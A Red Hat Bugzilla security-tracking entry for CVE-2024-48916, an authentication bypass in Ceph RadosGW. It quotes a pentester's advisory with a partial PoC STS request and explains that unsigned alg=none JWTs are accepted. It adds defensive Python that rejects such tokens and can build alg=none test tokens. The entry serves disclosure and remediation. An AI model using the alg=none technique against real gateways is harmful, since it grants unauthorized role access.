Bug 2323274

Summary: CVE-2024-48916 ceph: Authentication bypass in CEPH RadosGW [ceph-8]
Product: [Red Hat Storage] Red Hat Ceph Storage Reporter: Sage McTaggart <amctagga>
Component: Security    Assignee: Matt Benjamin (redhat) <mbenjamin>
Status: CLOSED ERRATA QA Contact: Hemanth Sai <hmaheswa>
Severity: medium Docs Contact:
Priority: unspecified    
Version: 8.1CC: abhraj, amctagga, ceph-eng-bugs, cephqe-warriors, gsuckevi, jcaratza, kdreyer, mkasturi, prsrivas, tserlin, vpapnoi
Target Milestone: ---    Keywords: Security, SecurityTracking
Target Release: 8.0z1   
Hardware: Unspecified   
OS: Unspecified   
Whiteboard:
Fixed In Version: ceph-19.2.0-54.el9cp Doc Type: If docs needed, set a value
Doc Text:
Story Points: ---
Clone Of:
: 2323276    Environment:
Last Closed: 2024-12-11 14:14:11 UTC Type: Bug
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:
Bug Depends On:    
Bug Blocks: 2329846, 2323279    

Description Sage McTaggart 2024-11-01 21:03:23 UTC
https://github.com/ceph/ceph/security/advisories/GHSA-5g9m-mmp6-93mq
Summary below: 
Description
Summary

It is possible to bypass the CEPH rados authentication gw by providing a JWT as demonstrated in the PoC. In this case Keycloak is used as IdP.

This was found during a penetration test. Please assign CVE and credit me as finding this vulnerability. Do not mention the customer/organisation in public reports etc.

Details have also been provided to security before. As always, please fix this within 90 days as we plan to go public.
Details

It is possible to send a JWT that has "none" as JWT alg. By doing so the JWT signature is not checked.

The vulnerability is probably in the RadosGW OIDC provider.
PoC

The HTTP request can be found below. But without the JWT:

POST / HTTP/2
Host: storage.xxx.se
User-Agent: aws-sdk-go-v2/1.18.0 os/macos lang/go/1.21.1 X:nocoverageredesign md/GOOS/darwin md/GOARCH/arm64 api/sts/1.19.0
Content-Type: application/x-www-form-urlencoded
Amz-Sdk-Invocation-Id: 30a74697-7d7e-4c02-b041-97d68156ee78
Amz-Sdk-Request: attempt=1; max=3
Content-Length: 1508
Accept-Encoding: gzip, deflate, br

Action=AssumeRoleWithWebIdentity&DurationSeconds=3600&RoleArn=arn%3Aaws%3Aiam%3A%3Aorg_pentest002%3Arole%2Fu-pentest002STS&RoleSessionName=test&Version=2011-06-15&WebIdentityToken=ey..

Impact

This was found during a penetration test. Please assign CVE and credit me as finding this vulnerability. We can also request CVE from Mitre.
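
Added example (not code from Ceph, RadosGW or the advisory): a validator for the WebIdentityToken of an AssumeRoleWithWebIdentity request that refuses alg=none, or any alg outside a fixed allowlist, before any signature logic runs, plus a small helper that pulls the claimed alg out of a captured STS form body for log triage. HS256 with a constructed key stands in for the RS256/JWKS verification a real OIDC deployment would perform against the IdP; the key, claims and request bodies are constructed, and the pentest role name is reused only as a sample subject.

```python
import base64
import hashlib
import hmac
import json
from urllib.parse import parse_qs

ALLOWED_ALGS = {"HS256"}  # fixed by deployment config; the token's own header never decides it
def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))
def b64url_encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()
def check_web_identity_token(token: str, key: bytes):
    """Return (accepted, reason). alg=none is refused before any signature logic runs."""
    parts = token.split(".")
    if len(parts) != 3:
        return False, "malformed: expected header.payload.signature"
    header_b64, payload_b64, sig_b64 = parts
    try:
        header = json.loads(b64url_decode(header_b64))
    except ValueError:  # bad base64, bad UTF-8 or bad JSON
        return False, "malformed header"
    alg = header.get("alg") if isinstance(header, dict) else None
    if alg not in ALLOWED_ALGS:  # rejects "none", "None", a missing alg and any downgrade
        return False, f"alg {alg!r} not permitted"
    if not sig_b64:
        return False, "empty signature"
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        return False, "bad signature"
    return True, "ok"

def make_token(claims: dict, alg: str, key: bytes = b"") -> str:
    """Constructed test tokens: a signed HS256 one, or an unsigned alg=none one."""
    header_b64 = b64url_encode(json.dumps({"alg": alg, "typ": "JWT"}).encode())
    payload_b64 = b64url_encode(json.dumps(claims).encode())
    signing_input = f"{header_b64}.{payload_b64}".encode()
    sig = hmac.new(key, signing_input, hashlib.sha256).digest() if alg == "HS256" else b""
    return f"{header_b64}.{payload_b64}.{b64url_encode(sig)}"
def alg_from_sts_body(body: str):
    """Log triage: the alg claimed by the WebIdentityToken in an AssumeRoleWithWebIdentity body."""
    params = parse_qs(body)
    if params.get("Action") != ["AssumeRoleWithWebIdentity"]:
        return None
    token = params.get("WebIdentityToken", [""])[0]
    try:
        header = json.loads(b64url_decode(token.split(".")[0]))
    except ValueError:
        return None
    return header.get("alg") if isinstance(header, dict) else None
```

Any request whose token reports an alg outside the configured set, or no signature segment, is worth an alert on its own, independent of whether the gateway in front of it has been patched.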

Comment 10 errata-xmlrpc 2024-12-11 14:14:11 UTC
Since the problem described in this bug report should be
resolved in a recent advisory, it has been closed with a
resolution of ERRATA.

For information on the advisory (Important: Red Hat Ceph Storage 8.0 security update), and where to find the updated
files, follow the link below.

If the solution does not work for you, open a new bug report.

https://access.redhat.com/errata/RHSA-2024:10956

Comment 11 Red Hat Bugzilla 2025-04-11 04:25:09 UTC
The needinfo request[s] on this closed bug have been removed as they have been unresolved for 120 days